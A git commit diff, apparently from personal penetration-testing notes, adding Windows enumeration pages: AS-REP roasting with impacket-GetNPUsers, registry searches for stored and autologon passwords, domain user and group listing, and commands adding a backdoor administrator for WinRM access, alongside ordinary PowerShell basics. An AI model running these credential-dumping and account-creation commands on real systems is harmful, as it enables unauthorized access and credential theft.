added windows enumeration details.

This commit is contained in:
gurkenhabicht 2025-05-21 17:27:29 +02:00
parent dedafc3c94
commit 9be912401b
5 changed files with 98 additions and 13 deletions

View File

@ -0,0 +1,12 @@
# AS-Rep Roating
AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
This is somewhat similar to Kerberoasting but includes user accounts as well.
## Usage
Impacket got `GetNPUsers` to check non pre-authenticated user accounts and find credentials.
```sh
impacket-GetNPUsers $TARGET_DOMAIN/ -dc-ip $TARGET_DC_IP -usersfile $USERS_FILE -format hashcat -outputfile hashes.txt -no-pass
```

View File

@ -1,18 +1,23 @@
# Powershell Usage # Powershell Usage
## Get-Help ## Get-Help
``` ```
Get-Help Command-Name Get-Help Command-Name
``` ```
* Show examples
Show examples
``` ```
Get-Help Command-Name -Examples Get-Help Command-Name -Examples
``` ```
* Get-Command gets all the cmdlets installed on the current Computer. Get-Command gets all the cmdlets installed on the current Computer.
``` ```
Get-Command Get-Command
``` ```
``` ```
Get-Command Verb-* Get-Command Verb-*
Get-Command Invoke-* Get-Command Invoke-*
@ -20,19 +25,23 @@ Get-Command Get-*
``` ```
## Passing Output via Pipe ## Passing Output via Pipe
* A pipe passes object including methods and attributes.
A pipe passes object including methods and attributes.
``` ```
Verb-Noun | Get-Member Verb-Noun | Get-Member
``` ```
``` ```
Get-Command | Get-Member -MemberType Method Get-Command | Get-Member -MemberType Method
``` ```
## Creating Objects from Previous Cmdlets ## Creating Objects from Previous Cmdlets
``` ```
Get-ChildItem | Select-Object -Property Mode, Name Get-ChildItem | Select-Object -Property Mode, Name
``` ```
* first - gets the first x object * first - gets the first x object
* last - gets the last x object * last - gets the last x object
* unique - shows the unique objects * unique - shows the unique objects
@ -74,7 +83,7 @@ Get-ChildItem | Sort-Object
## Finding a File ## Finding a File
``` ```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
``` ```
```sh ```sh
Get-HotFix | Format-list | findstr <searchstring> Get-HotFix | Format-list | findstr <searchstring>
``` ```
@ -111,7 +120,7 @@ Copy-Item <sourcefile> <destfile>
## Count Lines of Output ## Count Lines of Output
As an example, count all cmdlets on the system As an example, count all cmdlets on the system
``` ```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
``` ```
## Count Words ## Count Words
@ -129,7 +138,7 @@ Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
Get-Location Get-Location
``` ```
## File Metadata ## File Metadata
```sh ```sh
ls | Format-List * ls | Format-List *
``` ```
@ -216,7 +225,7 @@ driverquery
### Processes ### Processes
* Start processes * Start processes
```sh ```sh
Start-Process <process> Start-Process <process>
``` ```
@ -265,7 +274,7 @@ Get-ACL C:\
### Port Scanner ### Port Scanner
``` ```
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i} for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
``` ```
### Ping Hosts ### Ping Hosts
```sh ```sh

View File

@ -0,0 +1,9 @@
# Registry Enumeration
## Usage
Query keys including the string `password` via `reg`.
```sh
reg query HKLM /f "password" /t REG_SZ /s
```

View File

@ -1,16 +1,61 @@
# Add user as system user # Users
## List Users
List local users
```
net user
```
List users of the domain
```
net user /domain
```
Get more information about a user
```
net user Administrator /domain
```
## List Groups
List local groups
```
net localgroup
```
List groups of the domain
```
net group /domain
```
Get more information about a group
```
net group Administrator /domain
```
## Add user as system user
```sh ```sh
net user <username> <password> /add net user <username> <password> /add
``` ```
```sh ```sh
net localgroup Administrator <username> /add net localgroup Administrator <username> /add
``` ```
```sh ```sh
net localgroup "Remote Management Users" <username> /add net localgroup "Remote Management Users" <username> /add
``` ```
```sh ```sh
net user <username> net user <username>
``` ```
* connect via winRM
connect via winRM afterwards using the new user

View File

@ -1,7 +1,17 @@
# Windows Registry # Windows Registry
## AutoLogin Password ## AutoLogin Password
* Automatic logon password is save in plaintext
Automatic logon password is save in plaintext
``` ```
reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon" reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon"
``` ```
## Search for Passwords
Use `reg` to search for passwords inside Keys of the registry via the following line.
```
reg query HKLM /f "password" /t REG_SZ /s
```